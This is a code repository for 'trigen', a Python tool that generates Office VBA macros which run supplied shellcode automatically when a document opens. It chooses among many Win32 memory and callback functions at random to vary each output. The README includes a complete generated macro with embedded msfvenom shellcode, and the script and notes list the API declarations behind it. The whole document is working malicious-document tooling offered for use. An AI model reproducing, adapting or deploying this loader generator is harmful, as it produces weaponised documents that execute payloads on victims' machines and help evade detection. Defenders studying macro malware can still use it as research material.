├── README.md ├── trigen.py └── function_VBA_notes.txt /README.md: -------------------------------------------------------------------------------- 1 | # trigen 2 | Trigen is a Python script that generates VBA which executes shellcode using varying combinations of Win32 function calls (one each for allocating memory, writing to it and executing it). 3 | 4 | Blog post - [17JAN2017 - Abusing native Windows functions for shellcode execution](http://ropgadget.com/posts/abusing_win_functions.html) 5 | 6 | Below is example output, with msfvenom generating the shellcode used as input. 7 | 8 | ``` 9 | # python trigen.py "$(msfvenom --payload windows/exec CMD='calc.exe' -f c)" 10 | No platform was selected, choosing Msf::Module::Platform::Windows from the payload 11 | No Arch selected, selecting Arch: x86 from the payload 12 | No encoder or badchars specified, outputting raw payload 13 | Payload size: 193 bytes 14 | 15 | ################################################ 16 | # # 17 | # Copy VBA to Microsoft Office 97-2003 DOC # 18 | # # 19 | # Alloc: HeapAlloc # 20 | # Write: RtlMoveMemory # 21 | # ExeSC: EnumSystemCodePagesW # 22 | # # 23 | ################################################ 24 | 25 | Private Declare Function createMemory Lib "kernel32" Alias "HeapCreate" (ByVal flOptions As Long, ByVal dwInitialSize As Long, ByVal dwMaximumSize As Long) As Long 26 | Private Declare Function allocateMemory Lib "kernel32" Alias "HeapAlloc" (ByVal hHeap As Long, ByVal dwFlags As Long, ByVal dwBytes As Long) As Long 27 | Private Declare Sub copyMemory Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long) 28 | Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemCodePagesW" (ByVal lpCodePageEnumProc As Any, ByVal dwFlags As Any) As Long 29 | 30 | Private Sub Document_Open() 31 | 32 | Dim shellCode As String 33 | Dim shellLength As Byte 34 | Dim byteArray() As Byte 35 | Dim memoryAddress As Long 36 | Dim zL As Long 37 | zL = 0 38 | Dim rL As Long 39 | 40 | shellCode = 
"fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6a018d85b20000005068318b6f87ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd563616c632e65786500" 41 | 42 | shellLength = Len(shellCode) / 2 43 | ReDim byteArray(0 To shellLength) 44 | 45 | For i = 0 To shellLength - 1 46 | 47 | If i = 0 Then 48 | pos = i + 1 49 | Else 50 | pos = i * 2 + 1 51 | End If 52 | Value = Mid(shellCode, pos, 2) 53 | byteArray(i) = Val("&H" & Value) 54 | 55 | Next 56 | 57 | rL = createMemory(&H40000, zL, zL) 58 | memoryAddress = allocateMemory(rL, zL, &H5000) 59 | 60 | copyMemory ByVal memoryAddress, byteArray(0), UBound(byteArray) + 1 61 | 62 | executeResult = shellExecute(memoryAddress, zL) 63 | 64 | End Sub``` 65 | -------------------------------------------------------------------------------- /trigen.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import random, sys 3 | 4 | __author__ = "Jeff White [karttoon] @noottrak" 5 | __email__ = "karttoon@gmail.com" 6 | __version__ = "1.0.1" 7 | __date__ = "04APR2017" 8 | 9 | # Dictionary structures 10 | # key = Function name 11 | # value = List of flags for supporting code to include, followed by respective declarations and VBA 12 | 13 | # Memory allocation functions 14 | memAlloc = { 15 | 'VirtualAlloc':[['ZL'], 16 | 'Private Declare Function allocateMemory Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long\n', 17 | 'memoryAddress = allocateMemory(zL, &H5000, &H1000, &H40)\n'], 18 | 'NtAllocateVirtualMemory':[['ZL', 'RL'], 19 | 'Private Declare Function allocateMemory Lib "ntdll" Alias "NtAllocateVirtualMemory" (ProcessHandle As Long, BaseAddress As 
Any, ByVal ZeroBits As Long, RegionSize As Long, ByVal AllocationType As Long, ByVal Protect As Long) As Long\n', 20 | 'memoryAddress = allocateMemory(ByVal -1, rL, zL, &H5000, &H1000, &H40)\n' +\ 21 | 'memoryAddress = rL\n'], 22 | 'ZwAllocateVirtualMemory':[['ZL', 'RL'], 23 | 'Private Declare Function allocateMemory Lib "ntdll" Alias "ZwAllocateVirtualMemory" (ProcessHandle As Long, BaseAddress As Any, ByVal ZeroBits As Long, RegionSize As Long, ByVal AllocationType As Long, ByVal Protect As Long) As Long\n', 24 | 'memoryAddress = allocateMemory(ByVal -1, rL, zL, &H5000, &H1000, &H40)\n' + \ 25 | 'memoryAddress = rL\n'], 26 | 'HeapAlloc':[['ZL', 'RL'], 27 | 'Private Declare Function createMemory Lib "kernel32" Alias "HeapCreate" (ByVal flOptions As Long, ByVal dwInitialSize As Long, ByVal dwMaximumSize As Long) As Long\n' +\ 28 | 'Private Declare Function allocateMemory Lib "kernel32" Alias "HeapAlloc" (ByVal hHeap As Long, ByVal dwFlags As Long, ByVal dwBytes As Long) As Long\n', 29 | 'rL = createMemory(&H40000, zL, zL)\n' +\ 30 | 'memoryAddress = allocateMemory(rL, zL, &H5000)\n'] 31 | } 32 | 33 | # Memory writing functions 34 | memWrite = { 35 | 'RtlMoveMemory':[[], 36 | 'Private Declare Sub copyMemory Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)\n', 37 | 'copyMemory ByVal memoryAddress, byteArray(0), UBound(byteArray) + 1\n'], 38 | 'WriteProcessMemory':[['ZL'], 39 | 'Private Declare Function copyMemory Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long\n', 40 | 'copyMemory ByVal -1, memoryAddress, VarPtr(byteArray(0)), UBound(byteArray) + 1, zL\n'] 41 | } 42 | 43 | # Shellcode execution functions 44 | exeShell = { 45 | 'CallWindowProcA':[['ZL'], 46 | 'Private Declare Function shellExecute Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Any, ByVal hWnd As Any, ByVal Msg As Any, 
ByVal wParam As Any, ByVal lParam As Any) As Long\n', 47 | 'executeResult = shellExecute(memoryAddress, zL, zL, zL, zL)\n'], 48 | 'CallWindowProcW':[['ZL'], 49 | 'Private Declare Function shellExecute Lib "user32" Alias "CallWindowProcW" (ByVal lpPrevWndFunc As Any, ByVal hWnd As Any, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any) As Long\n', 50 | 'executeResult = shellExecute(memoryAddress, zL, zL, zL, zL)\n'], 51 | 'DialogBoxIndirectParamA':[['WH', 'MH', 'OL'], 52 | 'Private Declare Function shellExecute Lib "user32" Alias "DialogBoxIndirectParamA" (ByVal hInstance As Any, ByVal hDialogTemplate As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal dwInitParam As Any) As Long\n', 53 | 'executeResult = shellExecute(moduleHandle, moduleHandle, windowHandle, memoryAddress, oL)\n'], 54 | 'DialogBoxIndirectParamW':[['WH', 'MH', 'OL'], 55 | 'Private Declare Function shellExecute Lib "user32" Alias "DialogBoxIndirectParamW" (ByVal hInstance As Any, ByVal hDialogTemplate As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal dwInitParam As Any) As Long\n', 56 | 'executeResult = shellExecute(moduleHandle, moduleHandle, windowHandle, memoryAddress, oL)\n'], 57 | 'EnumCalendarInfoA':[['OL', 'RL'], 58 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumCalendarInfoA" (ByVal pCalInfoEnumProc As Any, ByVal Locale As Any, ByVal Calendar As Any, ByVal CalType As Any) As Long\n', 59 | 'rL = 3072\n' +\ 60 | 'executeResult = shellExecute(memoryAddress, rL, oL, oL)\n'], 61 | 'EnumCalendarInfoW':[['OL', 'RL'], 62 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal pCalInfoEnumProc As Any, ByVal Locale As Any, ByVal Calendar As Any, ByVal CalType As Any) As Long\n', 63 | 'rL = 3072\n' +\ 64 | 'executeResult = shellExecute(memoryAddress, rL, oL, oL)\n'], 65 | 'EnumDateFormatsA':[['ZL'], 66 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumDateFormatsA" (ByVal lpDateFmtEnumProc As 
Any, ByVal Locale As Any, ByVal dwFlags As Any) As Long\n', 67 | 'executeResult = shellExecute(memoryAddress, zL, zL)\n'], 68 | 'EnumDateFormatsW':[['ZL'], 69 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumDateFormatsW" (ByVal lpDateFmtEnumProc As Any, ByVal Locale As Any, ByVal dwFlags As Any) As Long\n', 70 | 'executeResult = shellExecute(memoryAddress, zL, zL)\n'], 71 | 'EnumDesktopWindows':[['ZL'], 72 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumDesktopWindows" (ByVal hDesktop As Any, ByVal lpfn As Any, ByVal lParam As Any) As Long\n', 73 | 'executeResult = shellExecute(zL, memoryAddress, zL)\n'], 74 | 'EnumDesktopsA':[['ZL'], 75 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumDesktopsA" (ByVal hwinsta As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long\n', 76 | 'executeResult = shellExecute(zL, memoryAddress, zL)\n'], 77 | 'EnumDesktopsW':[['ZL'], 78 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumDesktopsW" (ByVal hwinsta As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long\n', 79 | 'executeResult = shellExecute(zL, memoryAddress, zL)\n'], 80 | 'EnumLanguageGroupLocalesA':[['ZL', 'OL'], 81 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumLanguageGroupLocalesA" (ByVal lpLangGroupLocaleEnumProc As Any, ByVal LanguageGroup As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long\n', 82 | 'executeResult = shellExecute(memoryAddress, oL, zL, zL)\n'], 83 | 'EnumLanguageGroupLocalesW':[['ZL', 'OL'], 84 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumLanguageGroupLocalesW" (ByVal lpLangGroupLocaleEnumProc As Any, ByVal LanguageGroup As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long\n', 85 | 'executeResult = shellExecute(memoryAddress, oL, zL, zL)\n'], 86 | 'EnumPropsExA':[['WH'], 87 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumPropsExA" (ByVal hWnd As Any, ByVal lpEnumFunc As Any) As Long\n', 88 | 
'executeResult = shellExecute(windowHandle, memoryAddress)\n'], 89 | 'EnumPropsExW':[['WH'], 90 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumPropsExW" (ByVal hWnd As Any, ByVal lpEnumFunc As Any) As Long\n', 91 | 'executeResult = shellExecute(windowHandle, memoryAddress)\n'], 92 | 'EnumPwrSchemes':[['ZL'], 93 | 'Private Declare Function shellExecute Lib "powrprof" Alias "EnumPwrSchemes" (ByVal lpfnPwrSchemesEnumProc As Any, ByVal lParam As Any) As Long\n', 94 | 'executeResult = shellExecute(memoryAddress, zL)\n'], 95 | 'EnumResourceTypesA':[['ZL'], 96 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceTypesA" (ByVal hModule As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long\n', 97 | 'executeResult = shellExecute(zL, memoryAddress, zL)\n'], 98 | 'EnumResourceTypesW':[['ZL'], 99 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceTypesW" (ByVal hModule As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long\n', 100 | 'executeResult = shellExecute(zL, memoryAddress, zL)\n'], 101 | 'EnumResourceTypesExA':[['ZL'], 102 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceTypesExA" (ByVal hModule As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any, ByVal dwFlags As Any, ByVal LangId As Any) As Long\n', 103 | 'executeResult = shellExecute(zL, memoryAddress, zL, zL, zL)\n'], 104 | 'EnumResourceTypesExW':[['ZL'], 105 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceTypesExW" (ByVal hModule As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any, ByVal dwFlags As Any, ByVal LangId As Any) As Long\n', 106 | 'executeResult = shellExecute(zL, memoryAddress, zL, zL, zL)\n'], 107 | 'EnumSystemCodePagesA':[['ZL'], 108 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemCodePagesA" (ByVal lpCodePageEnumProc As Any, ByVal dwFlags As Any) As Long\n', 109 | 'executeResult = shellExecute(memoryAddress, zL)\n'], 110 | 
'EnumSystemCodePagesW':[['ZL'], 111 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemCodePagesW" (ByVal lpCodePageEnumProc As Any, ByVal dwFlags As Any) As Long\n', 112 | 'executeResult = shellExecute(memoryAddress, zL)\n'], 113 | 'EnumSystemLanguageGroupsA':[['ZL'], 114 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemLanguageGroupsA" (ByVal lpLanguageGroupEnumProc As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long\n', 115 | 'executeResult = shellExecute(memoryAddress, zL, zL)\n'], 116 | 'EnumSystemLanguageGroupsW':[['ZL'], 117 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemLanguageGroupsW" (ByVal lpLanguageGroupEnumProc As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long\n', 118 | 'executeResult = shellExecute(memoryAddress, zL, zL)\n'], 119 | 'EnumSystemLocalesA':[['ZL'], 120 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemLocalesA" (ByVal lpLocaleEnumProc As Any, ByVal dwFlags As Any) As Long\n', 121 | 'executeResult = shellExecute(memoryAddress, zL)\n'], 122 | 'EnumSystemLocalesW':[['ZL'], 123 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemLocalesW" (ByVal lpLocaleEnumProc As Any, ByVal dwFlags As Any) As Long\n', 124 | 'executeResult = shellExecute(memoryAddress, zL)\n'], 125 | 'EnumThreadWindows':[['ZL'], 126 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumThreadWindows" (ByVal dwThreadId As Any, ByVal lpfn As Any, ByVal lParam As Any) As Long\n', 127 | 'executeResult = shellExecute(zL, memoryAddress, zL)\n'], 128 | 'EnumTimeFormatsA':[['ZL'], 129 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumTimeFormatsA" (ByVal lpTimeFmtEnumProc As Any, ByVal Locale As Any, ByVal dwFlags As Any) As Long\n', 130 | 'executeResult = shellExecute(memoryAddress, zL, zL)\n'], 131 | 'EnumTimeFormatsW':[['ZL'], 132 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumTimeFormatsW" (ByVal 
lpTimeFmtEnumProc As Any, ByVal Locale As Any, ByVal dwFlags As Any) As Long\n', 133 | 'executeResult = shellExecute(memoryAddress, zL, zL)\n'], 134 | 'EnumUILanguagesA':[['ZL'], 135 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumUILanguagesA" (ByVal lpUILanguageEnumProc As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long\n', 136 | 'executeResult = shellExecute(memoryAddress, zL, zL)\n'], 137 | 'EnumUILanguagesW':[['ZL'], 138 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpUILanguageEnumProc As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long\n', 139 | 'executeResult = shellExecute(memoryAddress, zL, zL)\n'], 140 | 'EnumWindowStationsA':[['ZL'], 141 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumWindowStationsA" (ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long\n', 142 | 'executeResult = shellExecute(memoryAddress, zL)\n'], 143 | 'EnumWindowStationsW':[['ZL'], 144 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumWindowStationsW" (ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long\n', 145 | 'executeResult = shellExecute(memoryAddress, zL)\n'], 146 | 'EnumWindows':[['ZL'], 147 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumWindows" (ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long\n', 148 | 'executeResult = shellExecute(memoryAddress, zL)\n'], 149 | 'EnumerateLoadedModules':[['PH', 'ZL'], 150 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "EnumerateLoadedModules" (ByVal hProcess As Any, ByVal EnumLoadedModulesCallback As Any, ByVal UserContext As Any) As Long\n', 151 | 'executeResult = shellExecute(processHandle, memoryAddress, zL)\n'], 152 | 'EnumerateLoadedModulesEx':[['PH', 'ZL'], 153 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "EnumerateLoadedModulesEx" (ByVal hProcess As Any, ByVal EnumLoadedModulesCallback As Any, ByVal UserContext As Any) As Long\n', 154 | 'executeResult = 
shellExecute(processHandle, memoryAddress, zL)\n'], 155 | 'EnumerateLoadedModulesExW':[['PH', 'ZL'], 156 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "EnumerateLoadedModulesExW" (ByVal hProcess As Any, ByVal EnumLoadedModulesCallback As Any, ByVal UserContext As Any) As Long\n', 157 | 'executeResult = shellExecute(processHandle, memoryAddress, zL)\n'], 158 | 'GrayStringA':[['MH', 'OL'], 159 | 'Private Declare Function shellExecute Lib "user32" Alias "GrayStringA" (ByVal hDC As Any, ByVal hBrush As Any, ByVal lpOutputFunc As Any, ByVal lpData As Any, ByVal nCount As Any, ByVal X As Any, ByVal Y As Any, ByVal nWidth As Any, ByVal nHeight As Any) As Long\n', 160 | 'executeResult = shellExecute(moduleHandle, oL, memoryAddress, oL, oL, oL, oL, oL, oL)\n'], 161 | 'GrayStringW':[['MH', 'OL'], 162 | 'Private Declare Function shellExecute Lib "user32" Alias "GrayStringW" (ByVal hDC As Any, ByVal hBrush As Any, ByVal lpOutputFunc As Any, ByVal lpData As Any, ByVal nCount As Any, ByVal X As Any, ByVal Y As Any, ByVal nWidth As Any, ByVal nHeight As Any) As Long\n', 163 | 'executeResult = shellExecute(moduleHandle, oL, memoryAddress, oL, oL, oL, oL, oL, oL)\n'], 164 | 'NotifyIpInterfaceChange':[['ZL', 'OL'], 165 | 'Private Declare Function shellExecute Lib "iphlpapi" Alias "NotifyIpInterfaceChange" (ByVal Family As Any, ByVal Callback As Any, ByVal CallerContext As Any, ByVal InitialNotification As Any, ByVal NotificationHandle As Any) As Long\n', 166 | 'executeResult = shellExecute(zL, memoryAddress, oL, oL, oL)\n'], 167 | 'NotifyTeredoPortChange':[['OL'], 168 | 'Private Declare Function shellExecute Lib "iphlpapi" Alias "NotifyTeredoPortChange" (ByVal Callback As Any, ByVal CallerContext As Any, ByVal InitialNotification As Any, ByVal NotificationHandle As Any) As Long\n', 169 | 'executeResult = shellExecute(memoryAddress, oL, oL, oL)\n'], 170 | 'NotifyUnicastIpAddressChange':[['ZL', 'OL'], 171 | 'Private Declare Function shellExecute Lib "iphlpapi" Alias 
"NotifyUnicastIpAddressChange" (ByVal Family As Any, ByVal Callback As Any, ByVal CallerContext As Any, ByVal InitialNotification As Any, ByVal NotificationHandle As Any) As Long\n', 172 | 'executeResult = shellExecute(zL, memoryAddress, oL, oL, oL)\n'], 173 | 'SHCreateThread':[['ZL'], 174 | 'Private Declare Function shellExecute Lib "shlwapi" Alias "SHCreateThread" (ByVal pfnThreadProc As Any, ByVal pData As Any, ByVal dwFlags As Any, ByVal pfnCallback As Any) As Long\n', 175 | 'executeResult = shellExecute(zL, zL, zL, memoryAddress)\n'], 176 | 'SHCreateThreadWithHandle':[['PH', 'ZL'], 177 | 'Private Declare Function shellExecute Lib "shlwapi" Alias "SHCreateThreadWithHandle" (ByVal pfnThreadProc As Any, ByVal pData As Any, ByVal flags As Any, ByVal pfnCallback As Any, ByVal pHandle As Any) As Long\n', 178 | 'executeResult = shellExecute(zL, zL, zL, memoryAddress, processHandle)\n'], 179 | 'SendMessageCallbackA':[['WH', 'ZL'], 180 | 'Private Declare Function shellExecute Lib "user32" Alias "SendMessageCallbackA" (ByVal hWnd As Any, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any, ByVal lpCallBack As Any, ByVal dwData As Any) As Long\n', 181 | 'executeResult = shellExecute(windowHandle, zL, zL, zL, memoryAddress, zL)\n'], 182 | 'SendMessageCallbackW':[['WH', 'ZL'], 183 | 'Private Declare Function shellExecute Lib "user32" Alias "SendMessageCallbackW" (ByVal hWnd As Any, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any, ByVal lpCallBack As Any, ByVal dwData As Any) As Long\n', 184 | 'executeResult = shellExecute(windowHandle, zL, zL, zL, memoryAddress, zL)\n'], 185 | # Works except you need to trigger an event 186 | # 'SetWinEventHook':[['MH', 'ZL', 'OL'], 187 | # 'Private Declare Function shellExecute Lib "user32" Alias "SetWinEventHook" (ByVal eventMin As Any, ByVal eventMax As Any, ByVal hmodWinEventProc As Any, ByVal lpfnWinEventProc As Any, ByVal idProcess As Any, ByVal idThread As Any, ByVal dwflags As Any) As Long\n', 188 | # 
'executeResult = shellExecute(zL, oL, moduleHandle, memoryAddress, zL, zL, zL)\n'], 189 | 'SetWindowsHookExA':[['ZL'], 190 | 'Private Declare Function shellExecute Lib "user32" Alias "SetWindowsHookExA" (ByVal idHook As Any, ByVal lpfn As Any, ByVal hMod As Any, ByVal dwThreadId As Any) As Long\n', 191 | 'executeResult = shellExecute(zL, memoryAddress, zL, zL)\n'], 192 | 'SetWindowsHookExW':[['ZL'], 193 | 'Private Declare Function shellExecute Lib "user32" Alias "SetWindowsHookExW" (ByVal idHook As Any, ByVal lpfn As Any, ByVal hMod As Any, ByVal dwThreadId As Any) As Long\n', 194 | 'executeResult = shellExecute(zL, memoryAddress, zL, zL)\n'] 195 | } 196 | 197 | # Random select functions from each dictionary 198 | allocFunc = memAlloc.keys()[random.randrange(0,len(memAlloc),1)] 199 | writeFunc = memWrite.keys()[random.randrange(0,len(memWrite),1)] 200 | shellFunc = exeShell.keys()[random.randrange(0,len(exeShell),1)] 201 | 202 | # Determine flags for support code required by the functions 203 | macFlag = [] 204 | 205 | for flagList in (memAlloc[allocFunc][0], memWrite[writeFunc][0], exeShell[shellFunc][0]): 206 | for flag in flagList: 207 | if flag not in macFlag: 208 | macFlag.append(flag) 209 | 210 | macro = '' 211 | 212 | macro += ''' 213 | ################################################ 214 | # # 215 | # Copy VBA to Microsoft Office 97-2003 DOC # 216 | # # 217 | # Alloc: %-35s # 218 | # Write: %-35s # 219 | # ExeSC: %-35s # 220 | # # 221 | ################################################\n 222 | ''' % (allocFunc, writeFunc, shellFunc) 223 | 224 | # Headers 225 | macro += memAlloc[allocFunc][1] 226 | macro += memWrite[writeFunc][1] 227 | macro += exeShell[shellFunc][1] 228 | if 'WH' in macFlag: 229 | macro += 'Private Declare Function getWindowHandle Lib "user32" Alias "GetActiveWindow" () As Long' 230 | if 'PH' in macFlag: 231 | macro += 'Private Declare Function getProcessHandle Lib "kernel32" Alias "GetCurrentProcess" () As Long' 232 | if 'TH' in macFlag: 
233 | macro += 'Private Declare Function getThreadHandle Lib "kernel32" Alias "GetCurrentThread" () As Long' 234 | if 'MH' in macFlag: 235 | macro += 'Private Declare Function getModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long' 236 | 237 | # Body 238 | macro += '''\n 239 | Private Sub Document_Open() 240 | 241 | Dim shellCode As String 242 | Dim shellLength As Long 243 | Dim byteArray() As Byte 244 | Dim memoryAddress As Long 245 | ''' 246 | 247 | # Supporting code for functions 248 | if 'WH' in macFlag: 249 | macro += 'Dim windowHandle As Long\n' +\ 250 | 'windowHandle = getWindowHandle()\n' 251 | if 'PH' in macFlag: 252 | macro += 'Dim ProcessHandle As Long\n' +\ 253 | 'ProcessHandle = getProcessHandle()\n' 254 | if 'TH' in macFlag: 255 | macro += 'Dim threadHandle As Long\n' +\ 256 | 'threadHandle = getThreadHandle()\n' 257 | if 'MH' in macFlag: 258 | macro += 'Dim moduleHandle As Long\n' +\ 259 | 'moduleHandle = getModuleHandle(vbNullString)\n' 260 | if 'ZL' in macFlag: 261 | macro += 'Dim zL As Long\n' +\ 262 | 'zL = 0\n' 263 | if 'OL' in macFlag: 264 | macro += 'Dim oL As Long\n' +\ 265 | 'oL = 1\n' 266 | if 'RL' in macFlag: 267 | macro += 'Dim rL As Long\n' 268 | 269 | # Filter msfvenom C/Py output to get a hex-string, 'FEEDADEADFEDBABE' 270 | if len(sys.argv) == 2: 271 | sys.argv[1] = sys.argv[1].replace('unsigned char buf[]', '') 272 | sys.argv[1] = sys.argv[1].replace('\n', '') 273 | sys.argv[1] = sys.argv[1].replace('buf', '') 274 | sys.argv[1] = sys.argv[1].replace('+', '') 275 | sys.argv[1] = sys.argv[1].replace('=', '') 276 | sys.argv[1] = sys.argv[1].replace('\\x', '') 277 | sys.argv[1] = sys.argv[1].replace('"', '') 278 | sys.argv[1] = sys.argv[1].replace(';', '') 279 | sys.argv[1] = sys.argv[1].replace(' ', '') 280 | 281 | print "temp\n%s\n" % sys.argv[1] 282 | 283 | if len(sys.argv[1]) > 256: 284 | macro += ''' 285 | shellCode = "%s"''' % sys.argv[1][0:256] 286 | for i in range(256,len(sys.argv[1]),256): 
287 | macro += ''' 288 | shellCode = shellCode & "%s"''' % sys.argv[1][i:i+256] 289 | else: 290 | macro += ''' 291 | shellCode = "%s"''' % sys.argv[1] 292 | else: 293 | print '[!] ERROR: Supply hexadecimal shellcode as input (eg msfvenom -p windows/exec CMD=\'calc.exe\' -f c)' 294 | sys.exit(1) 295 | 296 | macro += '''\n 297 | shellLength = Len(shellCode) / 2 298 | ReDim byteArray(0 To shellLength) 299 | 300 | For i = 0 To shellLength - 1 301 | 302 | If i = 0 Then 303 | pos = i + 1 304 | Else 305 | pos = i * 2 + 1 306 | End If 307 | Value = Mid(shellCode, pos, 2) 308 | byteArray(i) = Val("&H" & Value) 309 | 310 | Next\n 311 | ''' 312 | 313 | macro += memAlloc[allocFunc][2] + '\n' 314 | macro += memWrite[writeFunc][2] + '\n' 315 | macro += exeShell[shellFunc][2] + '\n' 316 | 317 | macro += "End Sub" 318 | 319 | print macro 320 | -------------------------------------------------------------------------------- /function_VBA_notes.txt: -------------------------------------------------------------------------------- 1 | ' ############################### 2 | ' # MEMORY ALLOCATION FUNCTIONS # 3 | ' ############################### 4 | 5 | 'Private Declare Function allocateMemory Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long 6 | 'Private Declare Function allocateMemory Lib "ntdll" Alias "NtAllocateVirtualMemory" (ProcessHandle As Long, BaseAddress As Any, ByVal ZeroBits As Long, RegionSize As Long, ByVal AllocationType As Long, ByVal Protect As Long) As Long 7 | 'Private Declare Function allocateMemory Lib "ntdll" Alias "ZwAllocateVirtualMemory" (ProcessHandle As Long, BaseAddress As Any, ByVal ZeroBits As Long, RegionSize As Long, ByVal AllocationType As Long, ByVal Protect As Long) As Long 8 | 'Private Declare Function createMemory Lib "kernel32" Alias "HeapCreate" (ByVal flOptions As Long, ByVal dwInitialSize As Long, ByVal dwMaximumSize As Long) As Long 9 | 'Private 
Declare Function allocateMemory Lib "kernel32" Alias "HeapAlloc" (ByVal hHeap As Long, ByVal dwFlags As Long, ByVal dwBytes As Long) As Long 10 | 11 | ' ########################## 12 | ' # WRITE MEMORY FUNCTIONS # 13 | ' ########################## 14 | 15 | 'Private Declare Sub copyMemory Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long) 16 | 'Private Declare Function copyMemory Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long 17 | 18 | ' ######################## 19 | ' # SUPPORTING FUNCTIONS # 20 | ' ######################## 21 | 22 | Private Declare Function getWindowHandle Lib "user32" Alias "GetActiveWindow" () As Long 23 | Private Declare Function getProcessHandle Lib "kernel32" Alias "GetCurrentProcess" () As Long 24 | Private Declare Function getThreadHandle Lib "kernel32" Alias "GetCurrentThread" () As Long 25 | Private Declare Function getModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long 26 | 27 | ' ############################# 28 | ' # SHELLCODE PIVOT FUNCTIONS # 29 | ' ############################# 30 | 31 | ' ##################### 32 | ' # WORKING FUNCTIONS # 33 | ' ##################### 34 | 35 | 'Private Declare Function shellExecute Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Any, ByVal hWnd As Any, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any) As Long 36 | 'Private Declare Function shellExecute Lib "user32" Alias "CallWindowProcW" (ByVal lpPrevWndFunc As Any, ByVal hWnd As Any, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any) As Long 37 | 'Private Declare Function shellExecute Lib "user32" Alias "DialogBoxIndirectParamA" (ByVal hInstance As Any, ByVal hDialogTemplate As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal dwInitParam As Any) As Long 38 | 'Private Declare Function 
